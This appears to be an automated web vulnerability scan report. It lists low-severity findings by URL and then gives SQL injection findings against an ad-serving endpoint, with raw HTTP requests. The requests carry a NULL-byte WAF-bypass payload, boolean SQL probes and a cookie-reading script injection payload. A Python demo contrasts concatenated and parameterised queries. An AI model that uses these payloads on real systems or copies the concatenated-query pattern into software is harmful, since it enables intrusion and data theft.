28.49. http://meyerweb.com/eric/thoughts/2007/04/14/reworked-reset/

28.50. http://multiply.com/

28.51. http://newstrust.net/

28.52. http://phonefavs.com/

28.53. http://posterous.com/

28.54. http://pulse.plaxo.com/pulse/

28.55. http://rbytes.net/design/style.css

28.56. http://s.ytimg.com/yt/cssbin/www-embed-vflPrzZNL.css

28.57. http://s7.addthis.com/static/r07/widget51.css

28.58. http://shop.vodafone.de/micropages/cookie-setting-page.htm

28.59. http://slashdot.org/

28.60. http://smaknews.com/

28.61. http://social.expression.microsoft.com/

28.62. http://social.msdn.microsoft.com/

28.63. http://social.technet.microsoft.com/

28.64. http://spe.redcated/ds/NMMRTUMISITP/FY11_Cloud_Scenario/CLD_W1DISWSSFAW_FxCDP_G_300x250_V1R1.swf

28.65. http://sphinn.com/

28.66. http://spongecell.com/api/widgets/clickthrough/263365

28.67. http://static.ak.fbcdn.net/rsrc.php/yt/r/CJLVmfhHQeD.css

28.68. http://statistics.wibiya.com/SetToolbarLoad.php

28.69. http://tipd.com/

28.70. http://tools.ietf.org/html/rfc2234]

28.71. http://tracker.icerocket.com/services/gatherer.php

28.72. http://unalog.com/

28.73. http://us.blackberry.com/eng/devices/blackberrytorch.jsp

28.74. http://uselessjunk.com/article_full.php

28.75. http://vodpod.com/

28.76. http://www.ad4mat.de/ads/conbanner_bild1.php

28.77. http://www.addtoany.com/email

28.78. http://www.allvoices.com/

28.79. http://www.amazon.com/

28.80. http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/

28.81. http://www.bebo.com/

28.82. http://www.bibsonomy.org/

28.83. http://www.blogger.com/

28.84. http://www.bookmarks.fr/

28.85. https://www.box.net/

28.86. http://www.care2.com/news/

28.87. http://www.citeulike.org/

28.88. http://www.codylindley.com/

28.89. http://www.connotea.org/

28.90. http://www.diigo.com/

28.91. http://www.dzone.com/

28.92. http://www.fark.com/

28.93. http://www.folkd.com/

28.94. http://www.gabbr.com/

28.95. http://www.giveawayoftheday.com/

28.96. http://www.gnu.org/licenses/gpl-3.0.txt

28.97. http://www.google-analytics.com/__utm.gif

28.98. http://www.google.de/coop/cse/brand

28.99. http://www.googleadservices.com/pagead/aclk

28.100. http://www.hemidemi.com/

28.101. http://www.hyves.nl/

28.102. https://www.infosecisland.com/blogview/5213-Splunk-4-Users-Review.html

28.103. http://www.instapaper.com/

28.104. http://www.jumptags.com/

28.105. http://www.kledy.de/

28.106. http://www.linkagogo.com/

28.107. http://www.live.com/

28.108. http://www.livejournal.com/

28.109. http://www.manualsonline.com/privacy.html

28.110. http://www.microsoft.com/windows/internet-explorer/default.aspx

28.111. http://www.mindbodygreen.com/

28.112. http://www.mister-wong.com/

28.113. http://www.modalpopups.com/

28.114. http://www.mylinkvault.com/

28.115. http://www.myspace.com/

28.116. http://www.netlog.com/

28.117. http://www.netvibes.com/

28.118. http://www.newsvine.com/

28.119. http://www.nmworkwear.de/index.php

28.120. http://www.nowpublic.com/

28.121. http://www.officedepot.com/

28.122. http://www.oneview.de/

28.123. http://www.orkut.com/

28.124. http://www.orthougm.com/nslookup.html

28.125. http://www.splunk.com/themes/splunk_com/css/v5.php

28.126. http://www.vodafone.de/cookie-setting-page.html

28.127. http://www.zanox-affiliate.de/tpv/

28.128. http://www91.intel.com/b/ss/intelcorp,intelappdeveloper,intelcorpsw/1/H.20.3/s73248818481806

28.129. http://ziffdavisbaseline.112.2o7.net/b/ss/ziffdavisbaseline,ziffdavisenterpriseglobal/1/H.17/s21695681395940

29. Cacheable HTTPS response

29.1. https://ebus.ota.org/default.aspx

29.2. https://in.getclicky.com/

29.3. https://lct.salesforce.com/

29.4. https://secure.opinionlab.com/comment20AMX.asp

29.5. https://splunk.webex.com/mw0305l/mywebex/default.do

29.6. https://static.getclicky.com/

29.7. https://www.americanexpress.com/airlines-credit-card/

29.8. https://www.americanexpress.com/credit-card-rewards/

29.9. https://www.americanexpress.com/gift/giftcardslanding.shtml

29.10. https://www.americanexpress.com/gold-card/

29.11. https://www.americanexpress.com/no-annual-fee-credit-cards/

29.12. https://www.blackberry.com/profile/

29.13. https://www.google.com/adsense/support/bin/request.py

29.14. https://www.slackinc.com/reprints/order.asp

30. HTML does not specify charset

30.1. http://a.ligatus.com/timeout.php

30.2. http://a.tribalfusion.com/i.cid

30.3. http://a.tribalfusion.com/j.ad

30.4. http://a.tribalfusion.com/z/j.ad

30.5. http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.11

30.6. http://ad.doubleclick.net/clk

30.7. http://altfarm.mediaplex.com/ad/ck/9700-118565-26469-2

30.8. http://amch.questionmarket.com/adscgen/st.php

30.9. http://api.tweetmeme.com/button.js

30.10. http://baselinemag.us.intellitxt.com/

30.11. http://blogmarks.net/

30.12. http://bs.serving-sys.com/BurstingPipe/adServer.bs

30.13. http://buzzport.gatech.edu/

30.14. http://c03.adsummos.net/a/e/s21719

30.15. http://cdn.w55c.net/i/0R8lWflQ0f_326769041.html

30.16. https://cibng.ibanking-services.com/cib/CEBMainServlet/Login

30.17. http://corp.americanexpress.com/gcs/travel/us/

30.18. http://demos.spongecell.com/404.html

30.19. http://download32.us.intellitxt.com/

30.20. http://download32.us.intellitxt.com/iframescript.jsp

30.21. http://fls.doubleclick.net/activityi

30.22. http://freeengineer.org/learnUNIXin10minutes.html

30.23. https://home.americanexpress.com/home/corporations.shtml

30.24. http://in.getclicky.com/

30.25. https://in.getclicky.com/

30.26. http://info.bisk.com/MCIndex.asp

30.27. http://internetmailmanager.com/s/svrg.asp

30.28. http://javascript.crockford.com/jsmin.html

30.29. http://jqueryui.com/about

30.30. http://jqueryui.com/themeroller/

30.31. http://links.industrybrains.com/click

30.32. http://macgpg.sourceforge.net/

30.33. http://metrixlablw.customers.luna.net/p10833/tagger_v03.php

30.34. http://now.eloqua.com/visitor/v200/svrGP.aspx

30.35. http://packetstorm.linuxsecurity.com/

30.36. http://ping.chartbeat.net/ping

30.37. http://pixel.intellitxt.com/pixel.jsp

30.38. http://rapidog.com/game-thoi-trang-bup-be-ba-by-rapidshare.html

30.39. http://searchnet.chitika.net/audience

30.40. http://spe.redcated/ds/NMMRTUMISAUB/

30.41. http://spe.redcated/ds/NMMRTUMISITP/

30.42. http://starpulse.us.intellitxt.com/intellitxt/switch.asp

30.43. http://static.getclicky.com/

30.44. https://static.getclicky.com/

30.45. http://statistics.wibiya.com/SetToolbarLoad.php

30.46. http://system.referforex.com/processing/impressions.asp

30.47. http://t2.trackalyzer.com/trackalyze.asp

30.48. http://tags.bluekai.com/site/2956

30.49. http://urlist.info/search/Kelentik

30.50. http://uselessjunk.com/article_full.php

30.51. http://redacted/FXM/iview/211419853/direct

30.52. http://redacted/MRT/iview/264255445/direct

30.53. http://webmail.aol.com/$|http:/travel.aol.com/$|http:/netscape.aol.com/$|http:/music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

30.54. http://www.ad4mat.de/ads/banner_data.php

30.55. http://www.baselinemag.com/blank.gif

30.56. http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/&hl=en&client=ca-pub-6422417422167576&adU=www.RiminiStreet.com&adT=ImageAd&gl=US&usg=AFQjCNH5RnMJStR1tz53GbCMllXhLJ0M_g/

30.57. http://www.baselinemag.com/images/marketplace-hdr-bg.gif

30.58. http://www.baselinemag.com/images/marketplace-hdr.gif

30.59. http://www.baselinemag.com/spacer.gif

30.60. http://www.beckercatalog.com/

30.61. http://www.beckeroregoncatalog.com/

30.62. http://www.beckerortho.com/

30.63. http://www.beckerortho.com/CAH_cd.asp

30.64. http://www.beckerortho.com/catalog.htm

30.65. http://www.beckerortho.com/history.htm

30.66. http://www.beckerortho.com/history/becker_history.htm

30.67. http://www.beckerortho.com/knee/training.htm

30.68. http://www.beckerortho.com/pastfp.htm

30.69. http://www.beckerortho.com/services.htm

30.70. http://www.beckerortho.com/tech.htm

30.71. http://www.beckerortho.com/thanks.htm

30.72. http://www.bitty.com/

30.73. https://www.blackberry.com/partnerzone/Forward.action

30.74. https://www.blackberry.com/partnerzone/Login.action

30.75. http://www.buscaglia.com/resources.htm

30.76. http://www.cisco.com/ipj/

30.77. http://www.cisco.com/warp/public/707/newsflash.html

30.78. http://www.csc.gatech.edu/copeland/jac/6612/info/Install-wireshark-on-MacOS.html

30.79. http://www.csc.gatech.edu/~copeland/6612/info/

30.80. http://www.csc.gatech.edu/~copeland/6612/info/Install-wireshark-on-MacOS.html

30.81. http://www.dest-unreach.org/socat/

30.82. http://www.eweek.com/c/a/Web-Services-Web-20-and-SOA/Smarter-Enterprise-and-NextGeneration-Web-Services/

30.83. http://www.freedownloadscenter.com/

30.84. http://www.freedownloadscenter.com/Contact_us.html

30.85. http://www.freedownloadscenter.com/Interaction/enter.php3

30.86. http://www.freedownloadscenter.com/Reviews/

30.87. http://www.freedownloadscenter.com/terms/team-calendar/calendar.html

30.88. http://www.itbusinessedge.com/info/gglprojmgmtbeta.aspx

30.89. http://www.jazdtech.com/techdirect/lg/logImpressions.htm

30.90. http://www.json.org/js.html

30.91. http://www.khabbr.com/

30.92. http://www.linkagogo.com/

30.93. http://www.linkfixerplus.com/

30.94. http://www.linuxsecurity.com/static-content/packetstorm.html

30.95. http://www.networksimplicity.com/openssh/

30.96. http://www.pgpi.org/

30.97. http://www.sitejot.com/

30.98. http://www.slackinc.com/journals.asp

30.99. http://www.slackinc.com/permissions/

30.100. http://www.slackinc.com/privacypolicy.asp

30.101. https://www.slackinc.com/reprints/order.asp

30.102. https://www.slackinc.com/subscribe/newsubs/atshcstep1.asp

30.103. https://www.slackinc.com/subscribe/newsubs/otistep1.asp

30.104. http://www.stunnel.org/

30.105. http://www.vibrantmedia.com/about/careers.asp

30.106. http://www.vibrantmedia.com/favicon.ico

30.107. http://www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

30.108. http://www.whselfinvest.de/banner/whsbanner.php

31. HTML uses unrecognised charset

31.1. https://secure.opinionlab.com/comment20AMX.asp

31.2. http://tools.ietf.org/html/rfc3492

31.3. http://tools.ietf.org/html/rfc3986

31.4. http://www.activeconversion.com/

31.5. http://www.ad4mat.de/ads/conbanner_bild1.php

31.6. http://www.tocka.com.mk/sonovnik.php

32. Content type incorrectly stated

32.1. http://a.ligatus.com/favicon.ico

32.2. http://a1.twimg.com/profile_images/318408304/wappenbeckum_normal.gif

32.3. http://a2.twimg.com/profile_images/272035086/Afrika_normal.gif

32.4. http://a3.twimg.com/profile_images/266810846/Foto_Marco_Rossegger_normal.GIF

32.5. http://ad.doubleclick.net/clk

32.6. http://amch.questionmarket.com/adscgen/st.php

32.7. http://api.tweetmeme.com/button.js

32.8. http://appcdn.wibiya.com/Handlers/newsticker.php

32.9. http://ar.voicefive.com/b/rc.pli

32.10. http://blogmarks.net/

32.11. http://bs.serving-sys.com/BurstingPipe/adServer.bs

32.12. http://c03.adsummos.net/a/e/error.ads

32.13. http://c03.adsummos.net/a/e/s21719

32.14. http://gdata.youtube.com/feeds/

32.15. http://homeappliance.manualsonline.com/proxy.class.php

32.16. http://homeappliance.manualsonline.com/regman/user/getUserBlock

32.17. http://in.getclicky.com/

32.18. https://in.getclicky.com/

32.19. http://javadl-esd.sun.com/update/AU/map-2.0.2.4.xml

32.20. http://metrixlablw.customers.luna.net/p10833/tagger_v03.php

32.21. http://mm.chitika.net/favicon.ico

32.22. http://now.eloqua.com/visitor/v200/svrGP.aspx

32.23. https://onlineapps.ibanking-services.com/olnas/OLNASServlet/StappsApp

32.24. http://owneriq.postaffiliatepro.com/scripts/track.php

32.25. http://personalsavings.americanexpress.com/javascripts/rates.json

32.26. http://pixel.intellitxt.com/pixel.jsp

32.27. http://rt32.infolinks.com/action/doq.htm

32.28. http://rt82.infolinks.com/action/doq.htm

32.29. http://rt83.infolinks.com/action/doq.htm

32.30. http://starpulse.us.intellitxt.com/intellitxt/switch.asp

32.31. http://static.getclicky.com/

32.32. https://static.getclicky.com/

32.33. http://survey.questionmarket.com/noauth/ktag_log.php

32.34. http://system.referforex.com/processing/impressions.asp

32.35. http://tools.cisco.com/search/display

32.36. http://track2.mybloglog.com/js/jsserv.php

32.37. http://track2.mybloglog.com/tr/urltrk.php

32.38. http://urlist.info/search/Kelentik

32.39. http://urls.api.twitter.com/1/urls/count.json

32.40. http://us.blackberry.com/favicon.ico

32.41. http://us.blackberry.com/foresee/foresee-surveydef.js

32.42. http://uselessjunk.com/article_full.php

32.43. http://users.tpg.com.au/j_birch/plugins/superfish/changelog.txt

32.44. http://videos.video-loader.com/sp/10711909126097144647865.js

32.45. http://videos.video-loader.com/sp/212119091279653321133331.js

32.46. http://videos.video-loader.com/sp/350119091292093356328905.js

32.47. http://videos.video-loader.com/sp/37211909126091178247379.js

32.48. http://videos.video-loader.com/sp/50811909125880119639927.js

32.49. http://videos.video-loader.com/sp/798119091292066790328795.js

32.50. http://videos.video-loader.com/sp/81211909126097148926263.js

32.51. http://webmail.aol.com/$|http:/travel.aol.com/$|http:/netscape.aol.com/$|http:/music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

32.52. http://widgets.etoro.com/calendar/CalendarJS.aspx

32.53. http://widgets.etoro.com/championship/ChampJS.aspx

32.54. https://www.blackberry.com/profile/

32.55. http://www.csc.gatech.edu/copeland/jac/6612/info/SSH-No-Password-Login.txt

32.56. http://www.download32.com/images/thumb/Bricolsoft_Zip_Compression_Library-161033.png

32.57. http://www.download32.com/images/thumb/mso2%20thum.gif

32.58. http://www.filetransit.com/images/thumb/2d87c03cd41f91bf73891204a7e5136d_Axence_NetTools_Pro.gif

32.59. http://www.filetransit.com/images/thumb/dc6c5c025c75144466152decaf8b7627_Magic_Basket.jpg

32.60. http://www.freedownloadscenter.com/Reviews/

32.61. http://www.freedownloadscenter.com/favicon.ico

32.62. http://www.google.com/uds/Gfeeds

32.63. http://www.itbusinessedge.com/info/gglprojmgmtbeta.aspx

32.64. http://www.jazdtech.com/techdirect/lg/logImpressions.htm

32.65. http://www.khabbr.com/

32.66. http://www.kledy.de/checkfield.php

32.67. http://www.linuxsecurity.com/images/distros/dist-foresight.gif

32.68. http://www.linuxsecurity.com/static-content/packetstorm.html

32.69. http://www.linuxsecurity.com/templates/LSv3-0.1-Front/images/box-header-top-left.png

32.70. http://www.linuxsecurity.com/templates/LSv3-0.1-Front/images/box-header-top-right.png

32.71. http://www.linuxsecurity.com/templates/LSv3-0.1-Front/images/contribute.png

32.72. http://www.linuxsecurity.com/templates/LSv3-0.1-Front/images/ls-logo.gif

32.73. http://www.mittelstandsblog.de/wp-content/themes/j4b20/gam_header.js

32.74. http://www.netvouz.com/web/images/favicon.ico

32.75. http://www.netvouz.com/web/images/h6_green.png

32.76. http://www.netvouz.com/web/images/searchtips.gif

32.77. http://www.orthougm.com/favicon.ico

32.78. http://www.orthougm.com/ldr.js

32.79. http://www.owneriq.com/images/favicon.ico

32.80. http://www.vibrantmedia.com/about/careers.asp

32.81. http://www.w3.org/TR/html4/loose.dtd

32.82. http://www.w3.org/TR/html4/strict.dtd

32.83. http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd

32.84. http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd

32.85. http://www.whselfinvest.de/banner/whsbanner.php

32.86. http://www2.sesamestats.com/paneltracking.aspx

33. Content type is not specified

34. SSL certificate

34.1. https://splunk.webex.com/

34.2. https://static.addtoany.com/

34.3. https://www.box.net/

34.4. https://www.infosecisland.com/



1. SQL injection
There are 67 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
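As an added illustration (not part of the CloudScan report or the scanned sites), the string-concatenation pattern that produces the findings below is placed beside the parameterised form, and the two inference rules the report relies on (one quote vs. two quotes in 1.1, the `' and 1=1--` / `' and 1=2--` pair in 1.2) are applied to each. The table, rows and the `fu` column name are constructed for the demonstration; SQLite stands in for whatever database the scanned endpoints use.

```python
import sqlite3

# Constructed sample table (not from the report): a lookup keyed on a
# request parameter, standing in for whatever the scanned endpoint queries.
SAMPLE_ROWS = [("0", "page-a"), ("1", "page-b"), ("0'", "quoted")]


def make_db():
    """Build an in-memory SQLite database holding the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ads (fu TEXT, name TEXT)")
    conn.executemany("INSERT INTO ads VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def lookup_concat(conn, fu):
    """Vulnerable form: the parameter is spliced into the SQL text, so a
    quote in the value changes the structure of the query."""
    sql = "SELECT name FROM ads WHERE fu = '" + fu + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_param(conn, fu):
    """Remediated form: the structure is fixed first (placeholder ?), the
    value is bound second, so the value can never become SQL syntax."""
    sql = "SELECT name FROM ads WHERE fu = ?"
    return [row[0] for row in conn.execute(sql, (fu,))]


def probe(lookup, conn, value):
    """Run one lookup and report what an external observer sees:
    ('ok', rows) for a normal response, ('error', name) for a DB error."""
    try:
        return ("ok", lookup(conn, value))
    except sqlite3.Error as exc:
        return ("error", type(exc).__name__)


def error_based_suspicion(lookup, conn, base):
    """Rule from finding 1.1: a single quote causes an error and a doubled
    quote makes it disappear, because '' is an escaped quote inside an SQL
    string literal. True means the endpoint looks injectable."""
    one_quote = probe(lookup, conn, base + "'")
    two_quotes = probe(lookup, conn, base + "''")
    return one_quote[0] == "error" and two_quotes[0] == "ok"


def difference_based_suspicion(lookup, conn, base):
    """Rule from finding 1.2: the decoded payloads ' and 1=1-- and
    ' and 1=2-- give different responses only if the condition was
    evaluated as SQL. True means the endpoint looks injectable."""
    true_case = probe(lookup, conn, base + "' and 1=1-- ")
    false_case = probe(lookup, conn, base + "' and 1=2-- ")
    return true_case != false_case


def report(base="0"):
    """Apply both scanner rules to each implementation and summarise."""
    conn = make_db()
    return {
        name: {
            "error_based": error_based_suspicion(fn, conn, base),
            "difference_based": difference_based_suspicion(fn, conn, base),
        }
        for name, fn in (("concat", lookup_concat), ("param", lookup_param))
    }


if __name__ == "__main__":
    for name, verdict in report().items():
        print(name, verdict)
```

Running it shows both rules fire for the concatenated query and stay silent for the parameterised one; note that with concatenation the doubled-quote probe silently compares against `0'`, not `0''`, which is why the error "disappears".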

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://googleads.g.doubleclick.net/pagead/ads [fu parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The fu parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fu parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /pagead/ads?client=ca-pub-5112821747420583&format=336x280_as&output=html&h=280&w=336&lmt=1296965252&channel=2020812945&ad_type=text_image&alt_color=EFF3F7&color_bg=EFF3F7&color_border=EFF3F7&color_link=2490D2&color_text=000000&color_url=5C5C5C&flash=10.1.103&url=http%3A%2F%2Fwww.filetransit.com%2Fdemo.php%3F6e3f0%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6896f2e55e7%3D1&dt=1296943652258&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296943652281&frm=0&adk=871793777&ga_vid=67021654.1296943652&ga_sid=1296943652&ga_hid=914616203&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=969&bih=1012&eid=36815002&ref=http%3A%2F%2Fburp%2Fshow%2F7&fu=0%00'&ifi=1&dtd=80&xpc=SbKz6UFPiZ&p=http%3A//www.filetransit.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.filetransit.com/demo.php?6e3f0%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6896f2e55e7=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 05 Feb 2011 23:05:39 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 14517

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><script>(function(){function a(c){this.t={};this.tick=function(d,e,b){var f=b?b:(new Date).getTime
...[SNIP]...
c?c:"http://csi.gstatic.com/csi","?v=3","&s="+(d[f].sn||"pagead")+"&action=",a.name,m.length?"&it="+m.join(","):"","",g,"&rt=",p.join(",")].join("");b=new Image;var r=d[f].c++;d[f].a[r]=b;b.onload=b.onerror=function(){delete d[f].a[r]};b.src=a;b=null;return a}};var l=d[f].load;function o(a,b){var c=parseInt(a,10);if(c>
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-5112821747420583&format=336x280_as&output=html&h=280&w=336&lmt=1296965252&channel=2020812945&ad_type=text_image&alt_color=EFF3F7&color_bg=EFF3F7&color_border=EFF3F7&color_link=2490D2&color_text=000000&color_url=5C5C5C&flash=10.1.103&url=http%3A%2F%2Fwww.filetransit.com%2Fdemo.php%3F6e3f0%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6896f2e55e7%3D1&dt=1296943652258&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296943652281&frm=0&adk=871793777&ga_vid=67021654.1296943652&ga_sid=1296943652&ga_hid=914616203&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=969&bih=1012&eid=36815002&ref=http%3A%2F%2Fburp%2Fshow%2F7&fu=0%00''&ifi=1&dtd=80&xpc=SbKz6UFPiZ&p=http%3A//www.filetransit.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.filetransit.com/demo.php?6e3f0%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6896f2e55e7=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 05 Feb 2011 23:05:40 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 11429

<style>body{margin:0;padding:0}</style><div id="google_flash_inline_div" style="position:relative;z-index:1001;width:336px"><div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><
...[SNIP]...

1.2. http://googleads.g.doubleclick.net/pagead/ads [url parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The url parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the url parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /pagead/ads?client=ca-pub-8946084125644802&output=html&h=90&slotname=1903810917&w=120&lmt=1296965214&flash=10.1.103&url=http%3A%2F%2Fwww.linuxsecurity.com%2Fadvisories%2F%3F1'%3D1'%20and%201%3d1--%20&dt=1296945314953&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=6016247947&correlator=1296945312778&frm=0&adk=343220409&ga_vid=34780583.1296945313&ga_sid=1296945313&ga_hid=717362596&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=985&bih=1012&ref=http%3A%2F%2Fburp%2Fshow%2F23&fu=0&ifi=2&dtd=17&xpc=Kc5XABeAHH&p=http%3A//www.linuxsecurity.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.linuxsecurity.com/advisories/?1'=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 05 Feb 2011 22:43:12 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 5053

<html><head><style>#abg{font-family:arial,sans-serif;font-size:12px;color:#000000;padding:0px 1px;white-space:nowrap;font-weight:bold;}.sep{height:2px;width:100%;}.bb{overflow:hidden;width:120px;}.al{
...[SNIP]...
length;++i)qs+='kw'+i+'='+adt[i]+'&';qs=qs.slice(0,-1);return rl_dest_url+qs;}function ss(wi){window.status=sl[wi];return true;}function cs(){window.status='';}i=0;adt=[];adt[i++]="Security";adt[i++]="Linux";adt[i++]="Vulnerability";adt[i++]="LAN+Software";var sl=[];</script></head><body bgcolor=#e6e6e6 text=#000000><table bgcolor=#e6e6e6 border=0 cellpadding=0 cellspacing=0 height=100% width=100% ><tr><td height=18 bgcolor=#e6e6e6 valign=middle><div class=bb><script>adu='';document.write('<a href="https://www.google.com/adsense/support/bin/request.py?contact=abg_afc&url=http://www.linuxsecurity.com/advisories/%3F1%27%3D1%27%2520and%25201%3D1--&hl=en&client=ca-pub-8946084125644802');if(adt.length==0)document.write('&adU=+'+'&adT=no+AdLinks+found');for(i=0;i<adt.length;++i)document.write('&adU='+(adu+='+')+'&adT='+adt[i]);document.write('" target=_blank id=abg>Ads by Google</a>');</script></div></td></tr><tr><td valign=top><div class=al style="padding:0px 0px"><div class=sep><img height=1 width=1 alt=""/></div><script>document.write("&nbsp;&nbsp;<a 